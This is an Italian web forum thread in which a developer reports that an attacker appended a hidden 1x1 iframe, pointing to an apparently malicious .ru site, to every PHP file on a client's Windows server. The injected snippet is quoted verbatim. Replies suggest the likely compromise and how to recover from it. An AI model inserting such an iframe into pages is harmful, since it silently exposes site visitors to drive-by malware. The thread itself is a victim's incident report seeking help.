Visualizzazione dei risultati da 1 a 5 su 5
  1. #1

    file php modificati sul server

    ciao, ho un problema alquanto strano.
    Un mio cliente mi ha kiamato dicendomi ke nn funzionavano piu le gallery sul suo sito, che finora avevano sempre funzionato.
    Controlloando tutto ho individuato il problema.

    Su tutti i file php presenti sul server ho trovato una modifica..se cosi si puo chiamare.

    In pratica su ogni file, dopo la chiusura del tag
    Codice PHP:
    ?> 
    ho trovato questo:
    Codice PHP:
    html><body><iframe width=1 height=1 border=0 frameborder=0 src="http://planetm6power.ru/cfi/index.php"></iframe></body></html>> 
    con la conseguenza che salta tutto lo script.

    Cosa può essere? Qualke hacker? o cos altro.
    Ora tocca che controlliamo tutti i siti in cui è presente qualke script php..

    Buone vacanze

  2. #2
    Utente di HTML.it L'avatar di ade_v
    Registrato dal
    Jan 2001
    Messaggi
    459
    Ho provato a guardare il sito riportato nel'iframe e firefox (l'ultima versione) me l'ha bloccato come 'sito malevolo'. La pista dell'hacker mi sembra la più attendibile
    ade_v@yahoo.it

    Fletto i muscoli e sono nel vuoto

    Se inviate messaggi privati, avvisatemi sul forum...

  3. #3
    è abbastanza chiaro quello che è successo: un cracker (l'hacker è una persona che studia non che fa danni) ha avuto accesso a quelle pagine modificandole

    ora se:
    - stai su server windows questo potrebbe voler dire che è riuscito ad eseguire del suo codice php ed ha avuto accesso ai file delle pagine php modificandole
    - stai su server linux questo potrebbe voler dire che hanno bucato la macchina, tranne che si utilizzi qualche particolare soluzione

    però li entrano in ballo pannelli di controllo, struttura del servizio di hosting e cosi via

    tutto ciò però va in secondo piano se tu utilizzi una gallery pre-confezionata ovvero che non hai scritto tu perché in questo caso basta google ed un bot per fare il patacrack (se sei su server windows)

    controlla che tu abbia le ultime versioni aggiornate dopo di che chiama il tuo hoster e spiega cos'è successo e, fagli notare (se stai su hosting linux), che apache (quindi php) non ha accesso in scrittura alle pagine .php perché stanno sotto un altro utente con permessi che bloccano la scrittura a tutti (quel fatidico 666/777) ... in realtà ci sarebberò da fare dei controlli prima di poter affermare con certezza una cosa del genere però se stai su linux è possibile/probabile che sia cosi ^^
    The fastest Redis alternative ... cachegrand! https://github.com/danielealbano/cachegrand

  4. #4
    il server è windows ed è di proprietà dell'azienda con la quale collaboro. Alla fine non è che ci siano chisà quali dati, i file php in questione sono dei semplici file per il crossdomain e altri per elencare il contenuto di una cartella.

    Cmq sia riferirò, poi v farò sapere.

  5. #5
    Utente di HTML.it
    Registrato dal
    Nov 2006
    Messaggi
    28

    stesso problema

    Salve ache a me è successa la stessa identica cosa, il server che utilizzo è un server windows, e vi faccio notare che oltre alle pagine php sono riusciti a modificare anche le pagine html (inserendo sempre la stessa stringa).
    Sapete come fare in modo che ciò non riaccada?
    Grazie, saluti.

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.